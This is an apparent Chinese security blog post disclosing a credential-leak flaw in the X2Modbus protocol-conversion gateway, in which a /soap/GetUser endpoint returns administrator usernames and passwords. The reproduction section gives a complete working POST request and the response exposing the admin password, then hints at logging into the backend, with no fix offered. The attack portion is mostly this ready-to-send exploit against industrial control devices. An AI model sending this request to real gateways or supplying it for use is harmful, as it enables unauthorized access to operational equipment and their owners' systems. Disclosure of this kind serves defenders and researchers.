讯饶科技 X2Modbus 敏感信息泄露

讯饶科技 X2Modbus 敏感信息泄露

文章目录

漏洞描述

X2Modbus是一款功能很强大的协议转换网关, 这里的X代表各家不同

的通信协议,2是To的谐音表示转换,Modbus就是最终支持的标准协议

是Modbus协议。使得用户可以根据现场设备的通信协议进行配置,转成

标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网

关。

在其中存在一个可以getuser的接口,其中就会泄露账号密码等信息

影响版本

不详

实现原理

通过调用getuser接口来获取账号密码信息,从而可以登录后台

漏洞复现

接口在/soap/GetUser构造请求数据包

yaml 复制代码
POST /soap/GetUser  HTTP/1.1
Host: 0.0.0.0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://0.0.0.0/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh-cn; username=admin1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58


<GetUser><User Name="admin" Password="admin"/></GetUser>

查看返回包

yaml 复制代码
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/xml; charset=utf-8
Set-Cookie: language=zh-cn; username=admin1
Content-Length: 407
<soap:Body>
<GetUserResult>
<UserName>admin</UserName>
<PassWord>admin123456</PassWord>
<Purview>4</Purview>
</GetUserResult>
</soap:Body>
</soap:Envelope>

emmm这里就复现成功了,接下来师傅们懂得

修复建议

暂无

注: 文章只为学习交流安全技术,有人非法盈利后果自行承担

相关推荐
渗透测试老鸟-九青2 天前
HW面试经验分享 | 北京蓝中研判岗
网络·经验分享·安全·网络安全·面试·渗透·代码审计
星尘安全4 天前
黑客利用 Telegram API 传播新的 Golang 后门
网络安全·黑客·漏洞·远控·后门
leeindex6 天前
ES 渗透查询 (Percolate query)
大数据·elasticsearch·搜索引擎·全文检索·中文分词·渗透·lucene
饮长安千年月12 天前
西湖论剑决赛IoT开发板 rce复现
物联网·网络安全·漏洞
core51213 天前
“可通过HTTP获取远端WWW服务信息”漏洞修复
nginx·漏洞·openresty·可通过http·获取远端www服务信息
NPE~14 天前
[渗透测试]热门搜索引擎推荐— — shodan篇
搜索引擎·渗透测试·实战·渗透·shodan·hack
NPE~20 天前
[漏洞篇]SQL注入漏洞详解
数据库·安全·渗透测试·教程·漏洞·sql注入
扣脚大汉在网络1 个月前
CVE-2025-0411 7-zip 漏洞复现
网络安全·漏洞
扛枪的书生1 个月前
Linux 提权指南
linux·渗透·kali·提权
愿得一人欣1 个月前
如何发现漏洞之我的多功能武器BurpSuite与全能插件
渗透·渗透工具大全